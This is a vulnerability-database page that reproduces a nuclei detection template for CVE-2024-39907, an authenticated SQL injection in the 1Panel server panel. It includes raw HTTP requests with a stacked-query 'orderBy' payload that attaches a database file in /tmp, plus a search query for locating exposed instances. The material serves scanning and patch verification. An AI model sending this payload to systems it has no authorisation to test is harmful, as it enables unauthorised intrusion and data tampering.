Lucene search
K

1Panel SQL Injection - Authenticated

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

1Panel SQL Injection - Authenticated, critical severity. Resolved in version 1.10.12-tls. Upgrade advised

Related
Refs
Code
id: CVE-2024-39907

info:
  name: 1Panel SQL Injection - Authenticated
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
  impact: |
    Authenticated attackers can exploit SQL injection vulnerabilities to execute arbitrary SQL queries, write files, and achieve remote code execution.
  remediation: |
    Upgrade to 1Panel version 1.10.12-lts or later.
  reference:
    - https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39907
    cwe-id: CWE-89
    epss-score: 0.29396
    epss-percentile: 0.9795
    cpe: cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
    product: 1panel
    vendor: fit2cloud
  tags: cve,cve2024,sqli,1panel,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        EntranceCode: ZW50cmFuY2U=
        Content-Type: application/json

        {"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}

      - |
        POST /api/v1/hosts/command/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(body_2, "SQL logic error","table exp already exists")
          - contains(header_1, 'psession')
        condition: and
# digest: 490a00463044022017beb1fa7d39fad32dde707fa06eb8b4fe630e610c30d5207a3172b7beb6b4cb022063a991ca4d6a96e060019e5445e5984da8eaf3e87028dbe92e229179b72fcf72:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation